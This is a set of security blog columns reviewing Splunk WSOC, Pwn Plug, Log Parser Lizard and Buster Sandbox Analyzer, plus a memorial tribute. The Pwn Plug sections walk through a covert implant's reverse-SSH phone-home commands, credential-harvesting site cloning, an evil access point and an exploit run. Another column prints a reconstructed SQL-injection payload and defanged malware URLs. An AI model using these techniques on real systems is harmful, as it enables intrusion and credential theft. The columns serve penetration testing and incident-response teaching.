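sourcetype="WinEventLog:Security"
  (EventCode=4946 OR EventCode=4947 OR EventCode=4948 OR
   EventCode=5156 OR EventCode=5157 OR EventCode=5158 OR EventCode=5159)
| stats count by EventCode
```

Swapping in the Windows 2003 firewall event codes in a copy of the relevant saved search is essentially all the customization amounts to.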
I imagine you can see the value in WSOC, particularly from an audit and awareness perspective. The nice thing about Splunk apps is they can be enhanced and built upon with relative ease. Bojan and team also offer a supported, licensed version so that’s an option for you as well.

In Conclusion

WSOC is slick, particularly for teams already making use of Splunk. Once (or if) you’re comfortable with Splunk, you’ll find that apps such as WSOC and others make it invaluable for centralized, correlated data.
Again, if you want to read deeper dives into the power of Splunk and apps, ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Bojan Zdrnja, project lead, INFIGO IS

A Tribute to Tareq

This past Sunday we lost an extraordinary human being.
Tareq Saade perished doing something he loved as his was an adventurous spirit. My heart breaks for his family and his girlfriend Cindy, and as profound as my own sadness is, I can't begin to imagine their grief. My most sincere condolences are theirs. Tareq's family has asked that you donate to Red Cross in his memory; one of the many ways he gave was as a Red Cross volunteer. West Seattle Blog's post regarding his impact on the community he embraced is also a kind remembrance.
Tareq was one of those rare people about whom I have only ever heard good (great) things said.
Kind, brilliant, smart, funny, bright, giving, sharing, engaging, the list is endless and only does partial justice to his character.
To my regret I really only knew Tareq in a professional capacity as part of the information security community at Microsoft. Yet even in that limited scope I can say that I am surely better for having known him. If ever I had a question of him (he was expert in malware analysis and threat intelligence) it was often mere minutes in which he replied and always with a passion for the subject. For his 29 years he was worldly and I always learned something from him given both his deep intellect and his profound willingness to share. It was not for Tareq to be didactic as much as it was to be a natural mentor, again beyond his years.
It was my distinct privilege to have written an article with him and shared the stage with him as we co-presented at a Seattle-area information security gathering two years ago.
Much of the research I have conducted in recent years is touched by his generosity as he often provided samples, captures, feedback, or simply interest. Tareq was an ally against the Internet's evil denizens and our community will long mourn him while continuing to serve in his honor.
I imagine amateur radio operators will listen for W7TJS and feel the loss in the silence.
I imagine those he climbed with, those he dove with, those he worked with, those he gave with, and those he lived with will miss Tareq always. Ours is a lesser world without him.
When I first met Tareq, so as to ensure correct pronunciation, I asked him how to properly say Saade.
With a smile he said to me "It's easy, just like 'sad day'."
That it is, my friend, that it is.

I grieve for you, Tareq, I salute you, and I will miss you. Godspeed.



toolsmith: Pen Testing with Pwn Plug



Prerequisites
4GB SD card (needed for installation)






Dedicated to the memory of Tareq Saade 1983-2012:
This flesh and bone 
Is just the way that we are tied in 
But there's no one home
I grieve for you –Peter Gabriel 

Introduction
As you likely know by now given toolsmith’s position at the back of the ISSA Journal, March’s theme is Advanced Threat Concepts and Cyberwarfare. Well, dear reader, for your pwntastic reading pleasure I have just the topic for you. The Pwn Plug can be considered an advanced threat and useful in tactics that certainly resemble cyberwarfare methodology. Of course, those of us in the penetration testing discipline would only ever use such a device to the benefit of our legally engaged targets.
A half year ago I read about the Pwn Plug when it was offered in partnership with SANS for students taking vLive versions of SEC560: Network Penetration Testing and Ethical Hacking or SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking. It seemed very intriguing, but I’d already taken the 560 track, and was immersed in other course work. Then a couple of months ago I read that Pwnie Express had released the Pwn Plug Community Edition and was even more intrigued but I had a few things I planned to purchase for the lab before adding a Sheevaplug to the collection.  
But alas, the small world clause kicked in, and Dave Porcello (grep) and Mark Hughes from Pwnie Express, along with Peter LaPlante emailed to ask if I’d like to review a Pwn Plug.
The answer to that which you, dear readers, know to be a rhetorical question goes without saying.
Here’s the caveat. For toolsmith I’ll only discuss offerings that are free and/or open source. Pwn Plug Community Edition meets that standard, but the Pwnie Express team provided me with a Pwn Plug Elite for testing. As such, for this article, I will discuss only the features freely available in the CE to anyone who owns a Sheevaplug: “Pwn Plug Community Edition does not include the web-based Plug UI, 3G/GSM support, NAC/802.1x bypass.”
For those of you interested in a review of the remaining features exclusive to commercial versions, I’ll post it to my blog on the heels of this column’s publishing.
Dave provided me with a few insights including the Pwn Plug's most common use cases:
- Remote, low-cost pen testing: penetration test customers save on travel expenses, service providers save on travel time
- Penetration tests with a focus on physical security and social engineering
- Data leakage/exfiltration testing: using a variety of covert channels, the Pwn Plug is able to tunnel through many IDS/IPS solutions and application-aware firewalls undetected
- Information security training: the Pwn Plug touches on many facets of information security (physical, social & employee awareness, data leakage, etc.), thus making it a comprehensive (and fun!) learning tool

One of Pwnie Express’ favorite success stories comes from Jayson Street (The Forbidden Network) who was hired by a large bank to conduct a physical/social penetration test on ten bank branch offices. Armed with a Pwn Plug and a bit of social engineering finesse, Jayson was able to deploy a Pwn Plug at all four of the branch offices he attempted before the client decided to cut their losses and end the test early. In one instance, a branch manager actually directed Jayson to connect the Pwn Plug underneath his desk. Pwnie Express hopes the Pwn Plug helps illustrate how critical physical security and employee awareness are, and Jayson’s efforts delivered exactly that to his enterprise client.
Adrian Crenshaw (Irongeek) has Jayson’s Derbycon 2011 presentation video posted on his site. It’s well worth your time to watch it.

In addition to the Pwn Plug there is also the Pwn Phone, which is likewise capable of full-scale wireless penetration testing. Penetration testers and service providers often utilize the Pwn Phone for proposal meetings and demonstrations as the "wow factor" is high. As with the Pwn Plug, if you already own or can acquire a Nokia N900 you can download the community edition of Pwn Phone and get after it right away.

Pwn Plug compatibility is currently limited to Sheevaplug devices. There has been little demand so far for the Guruplug/Dreamplug form factors; the Guruplug hardware has a history of overheating, while the Dreamplug is quite bulky and flashy. Bulky and flashy do not equate to good resources for physical and social testing. The development team is working on a trimmed-down version of Pwn Plug for the $25 Pogoplug. Even though it offers only about half the performance and capacity of the Sheeva, with a larger board, it is only $25.

Figure 1 is a picture taken of the Pwn Plug I was sent for testing. You can see what we mean by the importance of form factor. It’s barely bigger than a common wall wart and you can use the included cord or plug it straight into the wall. Pwnie Express included a couple of sticker options for the Sheeva. I chose what looks to be a very typical bar code and manufacturer sticker that even has a PX part number. I chuckle every time I look at it.

Figure 1: Who, me?
With Sheevaplugs typically sporting a 1.2GHz ARM processor, 512MB SDRAM, and 512MB NAND flash, it’s recommended that you don’t treat the device like a workhorse (no Fast-Track, Autopwn, or password cracking), but it’s crazy good for maintaining access in stealth mode, reconnaissance, sniffing, exploitation, and pivoting off to other victim hosts. Figure you’ll find the 512MB storage at about 70% of capacity after installation, but adding SD storage means you can add software within reason. Pwn Plug is Ubuntu underneath, so apt-get is still your friend.
The tool list for a device this small is impressive. Expect to find MSF3, dsniff, fasttrack, kismet, nikto, ptunnel, scapy, and many others at your command, most of which can be called right from the prompt without changing directories.

Installation

To install Pwn Plug CE on a stock Sheevaplug, download the JFFS2 image and follow the instructions. No need to reinvent the wheel here.

Pwning with Pwn Plug

To ensure full understanding for those who may not think in evil mode or conduct penetration testing activity, here’s a quick executive summary followed by the longer play:
Sneak a Pwn Plug into a physical location and plug it in; properly configured, it phones home, allowing you reverse shell access via a number of possible stealth modes. You can then set up a variety of exploit activities, run scanners, or conduct specific social engineering activity as I am about to demonstrate. The results are collected on the device and you can then retrieve them over the established shell access.

First, imagine the Pwn Plug hidden at the target site, lurking amongst all the other items usually plugged in to a power strip, hiding behind a desk in so innocuous a fashion as to go easily undetected. Figure 2 will send you scurrying about your workplace to ensure there are none in hiding as we speak.

Figure 2: The Pwn Plug looking so innocent 
I’ll walk through an extremely fun example with Pwn Plug but first you’ll need to ensure access. Commercial Pwn Plug users benefit from the Plug UI but those rolling their own with Pwn Plug CE can still phone home. Have a favorite flavor of reverse shell pwnzorship? Plain old reverse SSH is available or shell over DNS, HTTP, ICMP, SSL, or via 3G if you have the likes of an O2 E160.
The supporting scripts for reverse shell on the Pwn Plug are found in /var/pwnplug/scripts.
On your SSH receiver (BackTrack 5 recommended) I suggest checking out the PwnieScripts for Pwnie Express from Security Generation. @securitygen even has a method for setting up reverse SSH over Tor. I configured the Pwn Plug for HTTP because who doesn’t allow HTTP traffic outbound? :-)
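For the plain reverse-SSH flavor, the underlying idea is simple enough to sketch; the host, user, and forwarded port below are placeholders, and in practice the stock scripts in /var/pwnplug/scripts wrap this up for you:

```
# On the Pwn Plug: push a reverse tunnel out to the receiver, exposing
# the plug's SSH (port 22) on the receiver's localhost:3337
ssh -f -N -R 3337:localhost:22 pentester@receiver.example.com

# On the receiver: ride the tunnel back into the plug
ssh root@localhost -p 3337
```

The DNS, HTTP, ICMP, and SSL variants follow the same phone-home pattern, just tunneled over a protocol more likely to slip out of the target network unnoticed.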

Figure 3: Have shell, will pwn
Access established, time to pwn. One of my all-time favorite collections of mayhem is the Social Engineer Toolkit (SET). You will find SET at /var/pwnplug/set. Change directories appropriately via your established shell and run ./set.  You will be presented with the SET menu. I chose 2. Website Attack Vectors, then 3. Credential Harvester Attack Method followed by 2. Site Cloner (SET supports both HTTP and HTTPS). In an entirely intentional twist of irony I submitted http://mail.ccnt.com/igenus/login.php to SET as the URL to clone. Mind you, this is not a hack of the actual site being cloned so much as it is harvesting credentials via an extremely accurate replica wherein usernames and passwords are posted back to the Pwn Plug.
The test Pwn Plug was set up in the HolisticInfoSec Lab with an IP address of 192.168.248.23.
Imagine I’ve sent the victim a URL with http://192.168.248.23 hyperlinked as opposed to http://mail.ccnt.com/igenus/login.php and enticed them into clicking. Now don’t blink or you’ll miss it; I froze it for you in Figure 4.
Figure 4: SET harvesting from Pwn Plug
 After passing credentials the victim is then redirected back to the legitimate site none the wiser.
All the while, because you have shell access, you can gather results at your discretion. SET has a nice report generator and writes out to XML or HTML.
This is the tip of the iceberg for SET, and a mere fraction of the chaos you can unleash in whisper quiet mode via Pwn Plug. There are simply too many options to do it much justice in such short word space so as mentioned earlier I’ll continue the conversation on the HolisticInfoSec blog.

In Conclusion

I had a blast testing Pwn Plug; this is me after spending days doing so.


If you make your living as a penetration tester or need a really capable demonstration tool for social engineering awareness and prevention training, Pwn Plug is for you. Grab yourself a Sheevaplug, download Pwn Plug CE, and enjoy yourself (with permission)!
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Dave Porcello, CEO and Technical Lead, Pwnie Express

More Mayhem with Pwn Plug

In my last post regarding Pwn Plug I discussed the features available to those of you who build your own with a Sheevaplug and Pwn Plug Community Edition.
Here I'll give you an overview of some of the additional pwntastic upside you'll benefit from should you choose to buy Pwn Plug Wireless, 3G, or Elite. Wireless will get you an external 1000mW USB ALFA, 3G offers an O2 E160, and Elite includes a 16GB SDHC card for extra storage (along with all the goodies you get with Wireless & 3G). All commercial versions include support and the Plug UI, which makes setup insanely simple. I configured the Pwn Plug I tested for 802.11 evil with the ALFA as seen in Figure 1.

Figure 1: Pwn Plug Wireless
In the Pwn Plug UI (HTTPS over port 8443 by default) I clicked Basic Setup, then Evil AP Config. Figure 2 shows the AMIEVIL SSID coming to life.

Figure 2: Am I evil?
This is a GUI configuration method for airbase-ng, specifically airbase-ng -P -C 30 -c 3 -e AMIEVIL -v mon0.
Then all you need to do is follow with Karmetasploit via ./msfconsole -r karma.rc and you're off. "Karmetasploit is a great function within Metasploit, allowing you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients."
In addition to all the MSF3 functionality you'd expect, you can also utilize David Kennedy's Fast-Track. I ran ./fast-track.py -i, selected 6. Exploits, then 7. mIRC 6.34 Remote Buffer Overflow Exploit. Figure 3 shows my Windows XP SP3 victim coming aboard for pwnzor.

Figure 3: mIRC pwn


With your Pwn Plug firmly established on your target network, your recon options are also endless with an 802.11 interface enabled. Figure 4 shows Kismet happily enumerating from the Pwn Plug.

Figure 4: Kismet
So much fun, so little time. For those of you with penetration testing duties that include social engineering and red teaming tactics, I strongly suggest you explore the Pwnie Express site for yourself and the Pwn Plug options and features. You will not be disappointed.



MIR-ROR 2.0 released


MIR-ROR 2.0 has been released as the project has benefited from Jon Mark Allen's (ubahmapk) many contributions, giving MIR-ROR some much needed attention. 
MIR-ROR, or Motile Incident Response - Respond Objectively, Remediate, is a security incident response specialized, command-line script that calls specific Windows Sysinternals tools, as well as some other useful utilities, to provide live capture data for investigation.
You can easily enhance MIR-ROR to your liking with whatever command line tools you find useful. 
As an incident response resource, we’ve found it indispensable.
Windows Sysinternals licensing prevents us from bundling the tools in a distribution package; you’ll have to retrieve them for yourself. You can download the complete Sysinternals Suite, along with the other utilities needed, and unpack them in a preferred directory on your system (e.g., C:\tools\MIR-ROR). Check fetch.txt for everything you need to download.
Please feel free to submit suggestions or fixes via Issue Tracker and we'll review potential updates for future releases. 
You can read the complete ISSA Journal article, MIR-ROR: Motile Incident Response - Respond Objectively, Remediate, here.

toolsmith: Log Parser Lizard









Prerequisites
Windows

Introduction
At RSA Conference 2012 I gave a presentation called Evil Through The Lens of Web Logs. This presentation is built on research I’m conducting for a SANS Gold paper for graduate school and pays particular attention to SQL injection and Remote File Include attacks. One of the tools discussed as very useful for analysis tactics is Log Parser Lizard. You’re probably familiar with Log Parser, but I’ll bet you didn’t know there was a great GUI-based tool with which to leverage its raw power with ease. Log Parser Lizard (LPL) is the brainchild of Dimce Kuzmanov, a Macedonian software engineer who started Lizard Labs in 1998. In 2006, while also working as a part-time sysadmin on financial systems, Dimce recognized that he was using Log Parser on a daily basis for creating reports, analyzing logs, automatic error reporting, transferring data with txt files, etc. Over time his collection of queries became unmanageable and difficult to maintain, so he created LPL for his personal use and, having benefited from free software himself, wanted to release a useful freeware product to give back to the community. While LPL very successfully harnesses Log Parser’s capabilities, Dimce firmly believes that as a great UI it helps users learn and organize their queries with less effort. When he added log4net and regex input support, the Log Parser community really began to embrace LPL. LPL releases are a bit sporadic, usually based on a few new features and bug or code fixes; future releases are planned but not with a known frequency. Today LPL sees a user base of about 2,000 installations each month based on trend analysis for the last three years, and approximately 80,000 users worldwide.
The current production release of LPL is 2.1 and features include:
- Ability to organize queries along with an improved source code editor that includes enhanced source navigation and analysis capability, syntax highlighting, automatic source code completion, method insight, undo/redo, bookmarks, and more
- Support for Facebook Query Language (FQL). This feature was introduced to help Facebook developers organize their queries
- Code snippets (code templates) and constants. Log Parser Lizard also supports “constants” binding to static/shared properties from Microsoft .Net
- Numerous other user-interface features, including an advanced grid with filtering and grouping as well as support for charts without requiring a Microsoft Office installation, as is a dependency for a standalone instance of Log Parser
- Support for printing and exporting results to Excel and PDF documents
  - For registered users ($26.51 USD)
- Support for inline VB.Net code to create Log Parser SQL queries
Inline VB.net support allows you to drop your code between <% and %> marks; it will then be executed and the resulting string will be replaced in the query. Lizard Labs believes this feature will be very useful for LPL users. Before parsing logs you can move-copy-rename files, download via FTP, shutdown IIS, etc. You can also use .Net data types like DateTime for arithmetic operations and/or System.Environment settings in query parameters.
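As a hypothetical illustration of the <% %> mechanism (the log file mask and fields here are invented for the example, not taken from LPL's samples), inline VB.Net might compute today's IIS log filename at query time:

```sql
SELECT date, time, c-ip, cs-uri-stem, sc-status
FROM <% Return "ex" & DateTime.Now.ToString("yyMMdd") & ".log" %>
WHERE sc-status = 500
```

The VB.Net between the marks runs first and its return value is spliced into the Log Parser SQL before execution.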

As I write this I’m testing the beta for LPL 2.5 and the new feature set includes:
- Conditional field formatting (color, font, size, image) to identify required information. As an example, you can set conditions to change error colors to red, warnings to yellow, etc., or highlight a specific field if it contains a string value of interest
- Store and organize queries in a SQL Server database for ease of use among multiple users and computers in an organization, as well as backups, auditing, and all the other benefits that database storage allows
- Excel-style row filtering
- Ability to add columns with Excel-style formulas (with most Excel functions) and support for exporting in Excel 2007 format (more than 65,536 rows)

What would a toolsmith article be without a tool roadmap, so let’s not break a good habit, eh? LPL 3.0 will likely include out-of-the-box queries for IIS web reports (as in other commercial log analysis products), support for query execution scheduling, reports sent via e-mail from LPL, command line support, a query builder tool, a text file input format (where a single file is one record and fields can be extracted with RegEx or with Log Parser functions), and improved log4net input format. As with most of the tools we discuss, Dimce is certainly open to good ideas for the product and welcomes feedback and ideas from the user community. In total fantasy land the future of LPL may even include queries “in the cloud”, an LPL ASP.net web app that can be installed right on the server, a web service supporting LPL, mobile apps that can use this service, and a global query dictionary to which users can submit, comment on, and rate queries. “The future’s so bright, I gotta wear shades.” Whoa, 80’s flashback, sorry.


Using Log Parser Lizard

Installing Log Parser Lizard is so straightforward it doesn’t even warrant a section. Ensure you have Log Parser and .Net 3.5 installed, then execute the LPL installer. Finito.

As described above, I’ve been working on research for a paper which includes analysis of a mass SQL injection attack, well described in detail this past December by Mark Hofman on the SANS Internet Storm Center Diary. In addition to Mark’s analysis, this popular post included many comments and replies from readers who had suffered or noted the attack in their logs, and even some helpful folks who submitted log samples. You likely remember the LizaMoon attack, and the Lilupophilupop attack was quite similar. In both cases, injected sites offered a URL that then caused redirection to a fake antivirus offering. Specifically, a script reference to hxxp://lilupophilupop.com/sl.php was embedded in victim sites, where sl.php bounced you to the likes of hxxp://ift72hbot.rr.nu, then on to rogue AV. I actually had to look up the .rr.nu TLD; it’s the Republic of Moldova, and has been implicated recently in massive SPAM campaigns as well as the current WordPress hacks (as of this writing).
Figure 1 represents a victim site still exhibiting typical signs of compromise.

Figure 1: Lilupophilupop victim site
Victim sites were most often running ASP.net apps on IIS with MS-SQL back-ends. It was quickly learned that one identifying trait of the Lilupophilupop attack was a rather large hex blob evident in IIS logs. I’ve always found that checking logs for 500 errors when analyzing for SQL injection attacks can typically point you down the right path. Using a log file submitted by an ISC reader (anonymized for obvious reasons), I first built a query to seek ASP application errors from a default query included in LPL. I launched LPL, clicked IIS Logs, then ASP App Errors, replaced #IISW3C# in the FROM statement with the path to my anonymized log file, and finally clicked Run Query as seen in Figure 2. Email me if you’d like me to send you the log file so you can experiment for yourself.

Figure 2: LPL parsing error messages
Using this query, including FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 500) AND (cs-uri-stem LIKE '%.asp'), prior to being aware of lilupophilupop as a keyword or part of an injected URL, would have immediately narrowed the search vectors.
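Assembled into a complete Log Parser query (the SELECT field list here is my own choice for illustration, not the stock LPL query), it might look like this:

```sql
SELECT date, time, c-ip, cs-uri-stem, cs-uri-query, sc-status
FROM D:\logs\lilupophilupop\ex111201anon.log
WHERE (sc-status = 500) AND (cs-uri-stem LIKE '%.asp')
ORDER BY date, time
```

The same text pastes straight into a new LPL query window or runs at the command line via LogParser.exe with -i:IISW3C.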
Also common to attacks of this nature might be a DECLARE statement (defines variable(s)) visible in logs. A query as seen in Figure 3 produced three results that included a DECLARE statement followed by a CAST (converts an expression of one data type to another) statement wherein an attempt to pass the hex blob to the backend was noted.

Figure 3: LPL parsing DECLARE statements
 I clicked one of the results from 78.46.28.97, chose Select All, then Copy, and dropped the content to a text editor. I then grabbed the hex from just after the CAST statement to just prior to the AS VARCHAR statement and copied into a Burp Suite decoder window and chose decode as ascii hex.
Figure 4 shows the converted attack string.

Figure 4: Burp decoder converts hex
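If you'd rather script the conversion than use Burp, the same ascii-hex decode is a one-liner. The hex string below is a short, made-up stand-in for the real payload blob, which runs to thousands of characters:

```shell
# Decode an ascii-hex string such as the CAST() payload carries.
# The value below is a hypothetical snippet, not the actual blob.
hex="4445434C4152452040542056415243484152"
python3 -c "import sys; print(bytes.fromhex(sys.argv[1]).decode('ascii'))" "$hex"
# prints: DECLARE @T VARCHAR
```

Paste in the full blob from your own logs (everything between CAST( and AS VARCHAR) to recover the complete attack string.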
Long and short of it, the attack loops through all columns in all tables and updates their values by appending JavaScript that points to hxxp://lilupophilupop.com/sl.php.
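Decoded, payloads in this family of attacks generally follow the well-known cursor-driven pattern sketched below. This is a simplified reconstruction for illustration, not the verbatim Lilupophilupop payload:

```sql
-- Simplified reconstruction: walk every text-ish column of every
-- user table and append the malicious script reference
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u'
    AND (b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0)
BEGIN
  EXEC('UPDATE [' + @T + '] SET [' + @C + '] = [' + @C +
       '] + ''<script src="hxxp://lilupophilupop.com/sl.php"></script>''');
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
```

The xtype filters limit the loop to text, nvarchar, and varchar columns, which is why every string field on a compromised site ends up carrying the script tag.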
This took all of 5 to 10 minutes with LPL and a little experimentation. Yes, you can do all of this with Log Parser at the command line but if you’re looking for strong query management, tidy reporting exports including charts, and downright convenience, LPL is the way to go.

In Conclusion

Log Parser Lizard is one of those indispensable tools that treads lightly on your system but offers a huge bang for the buck. Free or $26? Puhleeze. Keep in mind that while I used an IIS log sample for the article you can throw LPL at generic XML, CSV, TSV and W3C based logs all day long. Download it and put it to good use right away. Dimce would love to hear from you, and I look forward to hearing your success stories.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Dimce Kuzmanov, lead developer and founder, Lizard Labs

toolsmith: Buster Sandbox Analyzer















Prerequisites
Windows
Sandboxie 3.64 or later


Introduction
On April 10th, 2012 a new version of Sandboxie was released, and on April 16th so too was a new version of the Buster Sandbox Analyzer which uses Sandboxie at its core. Voila! Instant toolsmith fodder.
It’s been a few months since we’ve covered a malware analysis-specific tool so the timing was excellent.
Buster Sandbox Analyzer is intended for use in analysis of process behavior and system changes (file system, registry, ports) during runtime for evaluation as suspicious. You’ll find it listed among the Sandbox Tools for Malware Analysis on one of my favorite Internet resources, Grand Stream Dreams.
As always, I pinged the developer and Pedro Lopez (pseudonym) provided me with a number of insightful details.
He releases new versions of Buster Sandbox Analyzer on a fairly regular basis, version 1.59 is current as I write this. There’s an update mechanism built right into BSA; just click Updates then Check for Updates.  Pedro has recently improved static analysis and he’s always trying to improve dynamic analysis as he considers it the most important aspect of the tool.
For future releases the TO-DO list is short given over two years of constant development.
The following features are planned:
- A feature to analyze URLs in automatic mode
- Utilizing the information stored in the SQL database, a feature to generate statistics including used compressors, detected samples, and others
Pedro continuously looks for new malware behaviors to include and improvements for the features already implemented. Your feedback is welcome here, readership.

Pedro was first motivated to create the tool thanks in large part to Sandboxie.
“Before I start coding Buster Sandbox Analyzer back in late 2010, I knew of Sandboxie already. I started using this great software around 2008 and had coded other utilities using Sandboxie as a file container so I knew already of the potential to write other types of programs for use with Sandboxie.
I created Buster Sandbox Analyzer because I didn't like that all publicly available malware analyzers were running under Linux. I like Linux based operating systems but I'm mainly a Windows user, so I wanted a malware analysis tool running under Windows. I knew Sandboxie was perfect for this task and with the help of Ronen Tzur (Sandboxie's author) it was possible to do it.”

Pedro cites several favorite use cases but two are stand outs for him:
1. Use the tool to learn what files and registry modifications were created by a program. While this use case is not always directly related to malware analysis, it can be used by any user who wants such information regarding program behavior.
2. Use the tool to learn if a file (executable, PDF document, Word document, etc.) exhibits malware-specific behavior.
Goes without saying, right?
Pedro reports that Buster Sandbox Analyzer suffers from a lack of user feedback (help change that!).
He’s not really sure how many people have used it to date or how many use it regularly but does recall one success story from a user on the Wilders Security Forums:
"I was shopping on Usenet for some tax software... I found it and ran it in the sandbox. As is my practice, I explored the installed files. Everything worked well. No obvious signs of infection, no writing to Windows, no start/run entries, and no files created in temp folders. But I still wasn't satisfied. I used Buster's program and reran the install...
The program logs were literally laced with created events, DNS queries to Russia, and many hidden processes. Needless to say, I kept it in the sandbox."

One message to convey to you, readers: a few versions ago Pedro introduced multi-language support; there are translations for Spanish, Russian, and Portuguese (Brazil), while a German translation may be available soon. He would like to have translations for Italian, French, Japanese, and Chinese and would be grateful if someone can contribute them.
Given the likelihood that this article will be read by security professionals, Pedro welcomes anyone who tries out BSA and has suggestions, ideas, feedback, bugs, etc. to send them to his attention at malware dot collector at gmail dot com.


Configure BSA

Refer to the installation and usage documentation on the BSA site as your primary source; the BSA guidance at reboot.pro is also helpful, though a bit dated. Consider it documentation reloaded. Actual installation of both Sandboxie and BSA is really straightforward, but there are some configuration tricks worth paying attention to. After reading reboot.pro, be sure to add the following to the Sandboxie default configuration file:
InjectDLL=C:\BSA\LOG_API.DLL
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
More importantly, this assumes you’ve installed BSA in C:\BSA. If you choose differently, you must modify the Sandboxie configuration file accordingly. Avoid the Program Files directories on later versions of Windows, given the need for administrative permissions to write there.
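Taken together, and assuming the stock sandbox name (DefaultBox in a default Sandboxie install) and a C:\BSA install path, the relevant portion of the Sandboxie configuration file would look something like this:

```ini
[DefaultBox]
InjectDLL=C:\BSA\LOG_API.DLL
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
```

If you analyze in a differently named box or installed BSA elsewhere, adjust the section name and DLL path accordingly.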
I’m a big fan of Windows shell integration with any tool that offers it. Under Options | Program Options | Windows Shell Integration select Add right-click action “Run BSA” and “Analyze in BSA”.
From Options set Common Analysis Options to include saving packet captures under Packet Sniffer via Save Capture To File. Be sure to select the correct adapter here as well. Note: BSA utilizes NetworkMinerConsole.exe for PCAP analysis. :-)
Also set your Report Options from the Options menu. I prefer HTML; you may also select PDF and XML.
You may also like the SQL options where you can write to a SQL database for analysis and report results.
Be sure to check out the additional features under the Utilities menu including submittal to online analyzers, file tools including disassembly, hashing, hex editing, renaming, signature check, scanning, and strings. There are also “explorers” for memory, PCAPs, PE files, processes, and registry hives as seen in Figure 1.

Figure 1: BSA Explorer features

Experiment and fine tune your settings. To then remember settings and load them automatically when the tool starts, select Options | Program Options | Save settings on exit. You can also save multiple configuration files via Options | Program Settings | Save Settings As so as to make use of different analysis patterns.
Lastly, and I imagine you knew I was going to say this, I run BSA in a Windows XP virtual machine and on a bare-metal install of Windows 7 running SteadierState. Some malware not only knows when it’s running in a VM but also when it’s running in Sandboxie. If you suspect that’s the case, you can hide Sandboxie during a BSA run via Program Options | Hide Sandboxie.


Using BSA

I wanted to test BSA in two different capacities, one with a browser-borne exploit and one with a “normal” PE.
I am privileged to receive a daily report inclusive of a number of drive-by exploit vehicles so I am always rich in options for exploration, and
hxxp:// www.ugpag.cd/index.php?option=com_content&view=article&id=49&Itemid=75 was no exception.
To examine it, I started BSA via bsa.exe in C:\BSA, tuned my BSA configuration to include some additional reporting options, clicked Start Analysis, right-clicked Internet Explorer and chose Run Sandboxed (given that Sandboxie is also integrated right into the Windows shell), and finally browsed to the ugpag.cd site. Once I willingly stepped through a few browser blocks (yes, I’m sure I want to do that), the “infection” process completed. I then chose Terminate All Programs by right-clicking the system tray Sandboxie icon, followed by Finish Analysis in BSA.
A few key elements jumped right out during BSA analysis and findings.
First, the site spawned an instance of Windows Media Player in order to “play” hcp_asx as seen in Figure 2.

Figure 2: Pwned site spawns Media Player for hcp_asx
Second, when reviewing Report.html, I quickly spotted two evil URLs (lukastroy.in & zdravyou.in) under Network services. Also note the Process/window information as seen in Figure 3.

Figure 3: BSA reporting reveals BlackHole URLs
A quick URLquery.net search for the URLs called gave me everything I needed to know.
Yep, BlackHole exploit kit. That was easy.

I used a Banload sample (MD5: D03BF6AE5654550A8A0863F3A265A412) to validate BSA’s PE analysis capabilities. As expected, they were robust. The File Disassembler utility immediately discerned that the sample was UPX-packed. Figure 4 points out a number of revealing elements.

Figure 4: BSA API logging reveals Banload behavior
Of interest is the fact that a connection is made to hxxp://alessandrodertolazzi.hospedagemdesites.ws (187.45.240.69) in Brazil, which attempts to download mac.rar. Banload/Banker commonly originates from Brazil, so this comes as no surprise. This sample is a bit dated, so the evilware hosted on Alessandro’s site is long gone, but you get the idea. If you optimize your BSA reporting options to include VirusTotal results, the Changes to file system section will include all the detections for created files as seen in Figure 5.

Figure 5: BSA reporting provides Virustotal results with created file
The opportunities for exploration are many with Buster Sandbox Analyzer, and the fact that it’s free and regularly developed is of huge benefit to our community. Among the features you may find noteworthy and useful are BSA’s ability to automatically analyze a folder in a batch process as well as to dump analyzed processes. BSA has moved to the top of my list for sandbox analysis, plain and simple.

In Conclusion

The combined strengths of Sandboxie and Buster Sandbox Analyzer make for a truly powerful and invaluable malware analysis platform. There’s no reason not to get started exploring right away. As always, do be careful playing with live samples, and remember to provide feedback to the BSA project; your support is welcome.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Pedro Lopez, lead developer, Buster Sandbox Analyzer






Bredolab author jailed, rehash of Bredolab analysis

Just read that the Bredolab botnet author was sentenced to 4 years in prison in Armenia.
In July 2010, when Bredolab was in its heyday, I used NetWitness Investigator to analyze a Bredolab-infected host. In honor of Georgy Avanesov's sentencing, following is a reprint of the resulting toolsmith article. Bredolab samples and PCAPs are available upon request via email or @holisticinfosec. NetWitness is now at version 9.7.5.4, so some of the guidance and how-to herein may have changed.




Prerequisites
Windows operating system (XP/2003 or later)


Introduction
As I write this month’s column I’m on a plane returning from the 22nd Annual FIRST Conference in Miami. As always, in addition to a collection of the world’s finest computer incident response teams, there were a select number of vendors. I will be honest and admit that I typically avoid conference vendor booths unless the swag is really good, but some of my favorites were in attendance, including Mandiant and Secunia. When I noticed the NetWitness booth I was reminded of the suggestions I’d heard that NetWitness Investigator would make a good toolsmith topic. During Robert Rounsavall’s FIRST presentation, Forensics considerations in next generation cloud environments, he mentioned that the Terremark teams make use of NetWitness offerings on their high-throughput network capture platforms. Incident responders, network analysts, and security engineers typically can’t get enough of good network capture tools; the reminder triggered by the NetWitness booth presence clearly indicated that the time had come.
Specifically, NetWitness Investigator is part of a suite of products offered by NetWitness that are designed to capture network traffic and use the resulting data for business and security problem analysis. Others include Administrator, Decoder, Concentrator, Broker, Informer, and the NwConsole. Most NetWitness applications are commercial offerings, but Investigator is freely available and quite useful.

Installing and configuring NetWitness Investigator
